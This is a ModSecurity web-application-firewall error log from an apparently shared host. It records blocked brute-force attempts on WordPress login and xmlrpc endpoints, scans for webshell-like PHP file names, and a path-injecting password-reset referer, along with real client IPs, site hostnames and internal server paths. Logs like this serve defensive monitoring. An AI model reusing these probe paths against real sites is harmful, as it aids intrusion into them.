[Tue May 26 15:52:10.067111 2026] [security2:error] [pid 747840:tid 747971] [client 103.153.130.62:55198] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0UYm6MwAuYuZKxvn4_AAAAQs"]
[Tue May 26 15:52:10.280759 2026] [security2:error] [pid 747840:tid 748043] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0UYm6MwAuYuZKxvn4-QAAAVM"]
[Tue May 26 15:52:11.836164 2026] [security2:error] [pid 747840:tid 748018] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0U4m6MwAuYuZKxvn5GgAAATo"]
[Tue May 26 15:52:15.183815 2026] [security2:error] [pid 747840:tid 747962] [remote 109.228.50.118:57372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.50.228.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahV0V4m6MwAuYuZKxvn5cAABRnk"]
[Tue May 26 15:52:15.984774 2026] [security2:error] [pid 747840:tid 747992] [client 14.232.157.77:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0V4m6MwAuYuZKxvn5fwAAASA"]
[Tue May 26 15:52:15.986732 2026] [security2:error] [pid 747840:tid 747983] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0V4m6MwAuYuZKxvn5fAAAARc"]
[Tue May 26 15:52:16.500538 2026] [security2:error] [pid 747840:tid 748042] [client 143.110.243.118:58102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/indosec.php"] [unique_id "ahV0WIm6MwAuYuZKxvn5iwAAAVI"]
[Tue May 26 15:52:18.216593 2026] [security2:error] [pid 747840:tid 748093] [client 114.119.152.167:49955] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV0Wom6MwAuYuZKxvn5pQAAAYU"], referer: http://haddingtonwines.com/cart?remove_item=a4d3af69a34ee0822adcbfc50bf1ded5
[Tue May 26 15:52:18.716752 2026] [security2:error] [pid 747840:tid 747994] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0Wom6MwAuYuZKxvn5pwAAASI"]
[Tue May 26 15:52:18.918168 2026] [security2:error] [pid 747840:tid 748016] [client 103.44.52.196:45756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0Wom6MwAuYuZKxvn5sQAAATg"]
[Tue May 26 15:52:18.918334 2026] [security2:error] [pid 747840:tid 748016] [client 103.44.52.196:45756] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0Wom6MwAuYuZKxvn5sQAAATg"]
[Tue May 26 15:52:20.348251 2026] [security2:error] [pid 745492:tid 745646] [client 103.153.130.62:55480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0XImEQglTmoWcfxKEEgAAAJo"]
[Tue May 26 15:52:20.348367 2026] [security2:error] [pid 745492:tid 745646] [client 103.153.130.62:55480] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0XImEQglTmoWcfxKEEgAAAJo"]
[Tue May 26 15:52:20.835853 2026] [security2:error] [pid 747840:tid 747971] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0XIm6MwAuYuZKxvn50QAAAQs"]
[Tue May 26 15:52:21.291611 2026] [security2:error] [pid 747840:tid 747889] [remote 74.7.241.58:54060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahV0XYm6MwAuYuZKxvn53QABHTA"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/wp-admin/network
[Tue May 26 15:52:22.328229 2026] [security2:error] [pid 745492:tid 745730] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0XYmEQglTmoWcfxKELQAAAO4"]
[Tue May 26 15:52:24.592320 2026] [security2:error] [pid 745492:tid 745651] [client 106.219.85.83:1671] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0YImEQglTmoWcfxKEUAAAAJ8"]
[Tue May 26 15:52:24.592501 2026] [security2:error] [pid 745492:tid 745651] [client 106.219.85.83:1671] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0YImEQglTmoWcfxKEUAAAAJ8"]
[Tue May 26 15:52:24.974697 2026] [security2:error] [pid 745492:tid 745684] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0YImEQglTmoWcfxKEUgAAAMA"]
[Tue May 26 15:52:28.100292 2026] [security2:error] [pid 747840:tid 747973] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0Y4m6MwAuYuZKxvn6SAAAAQ0"]
[Tue May 26 15:52:29.079784 2026] [security2:error] [pid 747840:tid 748049] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0ZIm6MwAuYuZKxvn6XQAAAVk"]
[Tue May 26 15:52:29.287904 2026] [core:crit] [pid 747840:tid 747989] (13)Permission denied: [client 40.77.167.159:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:52:30.041585 2026] [security2:error] [pid 747840:tid 748040] [client 103.44.52.196:43822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0Zom6MwAuYuZKxvn6gAAAAVA"]
[Tue May 26 15:52:30.041725 2026] [security2:error] [pid 747840:tid 748040] [client 103.44.52.196:43822] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0Zom6MwAuYuZKxvn6gAAAAVA"]
[Tue May 26 15:52:30.749088 2026] [security2:error] [pid 747840:tid 748007] [client 143.110.243.118:48562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/archives.php"] [unique_id "ahV0Zom6MwAuYuZKxvn6iwAAAS8"]
[Tue May 26 15:52:30.794987 2026] [security2:error] [pid 747840:tid 748029] [client 103.153.130.62:55773] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0Zom6MwAuYuZKxvn6jQAAAUU"]
[Tue May 26 15:52:30.795429 2026] [security2:error] [pid 747840:tid 748029] [client 103.153.130.62:55773] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0Zom6MwAuYuZKxvn6jQAAAUU"]
[Tue May 26 15:52:31.031224 2026] [security2:error] [pid 747840:tid 748051] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0Zom6MwAuYuZKxvn6iAAAAVs"]
[Tue May 26 15:52:31.652612 2026] [security2:error] [pid 745492:tid 745676] [client 114.119.144.84:53885] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "obinnawrites.com"] [uri "/letyyrn/exemple-livret-1-vae-aide-soignante-rempli-gratuit"] [unique_id "ahV0Z4mEQglTmoWcfxKEnQAAALg"], referer: https://www.smartimpresa.it/nNfhbe/exemple-de-livret-1-vae-rempli
[Tue May 26 15:52:33.102652 2026] [security2:error] [pid 747840:tid 748096] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0aIm6MwAuYuZKxvn6rQAAAYg"]
[Tue May 26 15:52:33.460478 2026] [core:crit] [pid 747840:tid 747974] (13)Permission denied: [client 40.77.167.11:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:52:33.741454 2026] [core:crit] [pid 747840:tid 748038] (13)Permission denied: [client 40.77.167.11:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:52:34.739371 2026] [security2:error] [pid 745492:tid 745742] [client 106.219.85.83:2700] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0aomEQglTmoWcfxKE3QAAAPo"]
[Tue May 26 15:52:34.739651 2026] [security2:error] [pid 745492:tid 745742] [client 106.219.85.83:2700] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0aomEQglTmoWcfxKE3QAAAPo"]
[Tue May 26 15:52:35.205190 2026] [security2:error] [pid 745492:tid 745714] [client 64.188.91.103:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahV0aomEQglTmoWcfxKE3AAAAN4"]
[Tue May 26 15:52:35.207533 2026] [security2:error] [pid 747840:tid 747994] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0aom6MwAuYuZKxvn67gAAASI"]
[Tue May 26 15:52:35.371211 2026] [security2:error] [pid 747840:tid 747872] [remote 64.188.91.103:57767] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "afstpaul.org"] [uri "/wp-content/plugins/fusion-builder/readme.txt"] [unique_id "ahV0a4m6MwAuYuZKxvn69QABPR8"]
[Tue May 26 15:52:36.074874 2026] [security2:error] [pid 747840:tid 748088] [client 223.123.35.44:36246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV0a4m6MwAuYuZKxvn6_AAAAYA"]
[Tue May 26 15:52:36.075000 2026] [security2:error] [pid 747840:tid 748088] [client 223.123.35.44:36246] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV0a4m6MwAuYuZKxvn6_AAAAYA"]
[Tue May 26 15:52:36.672076 2026] [security2:error] [pid 747840:tid 748066] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0bIm6MwAuYuZKxvn7BgAAAWo"]
[Tue May 26 15:52:38.732002 2026] [security2:error] [pid 745492:tid 745737] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0bomEQglTmoWcfxKFDAAAAPU"]
[Tue May 26 15:52:39.744588 2026] [security2:error] [pid 747840:tid 748058] [client 77.68.83.86:63394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/images/images/cache.php"] [unique_id "ahV0b4m6MwAuYuZKxvn7NAAAAWI"], referer: www.google.com
[Tue May 26 15:52:40.393269 2026] [security2:error] [pid 747840:tid 747888] [remote 83.212.240.55:36538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.240.212.83.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahV0cIm6MwAuYuZKxvn7QQABaS8"]
[Tue May 26 15:52:40.921500 2026] [security2:error] [pid 747840:tid 747981] [client 103.44.52.196:43208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0cIm6MwAuYuZKxvn7UAAAARU"]
[Tue May 26 15:52:40.921603 2026] [security2:error] [pid 747840:tid 747981] [client 103.44.52.196:43208] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0cIm6MwAuYuZKxvn7UAAAARU"]
[Tue May 26 15:52:41.323972 2026] [security2:error] [pid 747840:tid 748035] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0cIm6MwAuYuZKxvn7UQAAAUs"]
[Tue May 26 15:52:41.377953 2026] [security2:error] [pid 747840:tid 747983] [client 103.153.130.62:56065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0cYm6MwAuYuZKxvn7WAAAARc"]
[Tue May 26 15:52:41.378141 2026] [security2:error] [pid 747840:tid 747983] [client 103.153.130.62:56065] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0cYm6MwAuYuZKxvn7WAAAARc"]
[Tue May 26 15:52:42.189450 2026] [security2:error] [pid 747840:tid 747886] [remote 95.216.117.13:41360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahV0cYm6MwAuYuZKxvn7YQABfS0"]
[Tue May 26 15:52:42.198204 2026] [security2:error] [pid 747840:tid 748097] [client 114.119.141.201:50427] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/blog/category/parent-category/child-category-03/grandchild-category"] [unique_id "ahV0com6MwAuYuZKxvn7aAAAAYk"], referer: http://rohiniventures.com/blog/category/ween
[Tue May 26 15:52:42.351103 2026] [security2:error] [pid 747840:tid 748033] [client 143.110.243.118:51602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/po8sa.php"] [unique_id "ahV0com6MwAuYuZKxvn7bAAAAUk"]
[Tue May 26 15:52:42.415833 2026] [security2:error] [pid 747840:tid 748091] [client 123.23.235.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0com6MwAuYuZKxvn7ZAAAAYM"]
[Tue May 26 15:52:42.482062 2026] [security2:error] [pid 747840:tid 747876] [remote 124.156.212.23:64656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.212.156.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahV0com6MwAuYuZKxvn7agABCiM"]
[Tue May 26 15:52:43.267249 2026] [security2:error] [pid 745492:tid 745703] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0comEQglTmoWcfxKFNQAAANM"]
[Tue May 26 15:52:44.119028 2026] [security2:error] [pid 747840:tid 747843] [remote 123.30.233.13:50360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahV0c4m6MwAuYuZKxvn7ggABYQI"]
[Tue May 26 15:52:45.318061 2026] [security2:error] [pid 745492:tid 745673] [client 106.219.85.83:3283] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0dYmEQglTmoWcfxKFVQAAALU"]
[Tue May 26 15:52:45.318295 2026] [security2:error] [pid 745492:tid 745673] [client 106.219.85.83:3283] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0dYmEQglTmoWcfxKFVQAAALU"]
[Tue May 26 15:52:45.437067 2026] [security2:error] [pid 747840:tid 747986] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0dYm6MwAuYuZKxvn7kAAAARo"]
[Tue May 26 15:52:45.561074 2026] [security2:error] [pid 745492:tid 745535] [remote 5.42.158.148:52666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahV0dYmEQglTmoWcfxKFVgAAhSc"]
[Tue May 26 15:52:46.958901 2026] [security2:error] [pid 745492:tid 745691] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0domEQglTmoWcfxKFbgAAAMc"]
[Tue May 26 15:52:48.304686 2026] [security2:error] [pid 747840:tid 748078] [client 77.68.83.86:60805] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/images/images/cache.php"] [unique_id "ahV0eIm6MwAuYuZKxvn7qwAAAXY"], referer: www.google.com
[Tue May 26 15:52:48.696738 2026] [security2:error] [pid 747840:tid 747904] [remote 57.141.2.66:63778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 66.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahV0eIm6MwAuYuZKxvn7tAABOD8"]
[Tue May 26 15:52:48.945445 2026] [security2:error] [pid 747840:tid 748007] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0eIm6MwAuYuZKxvn7sgAAAS8"]
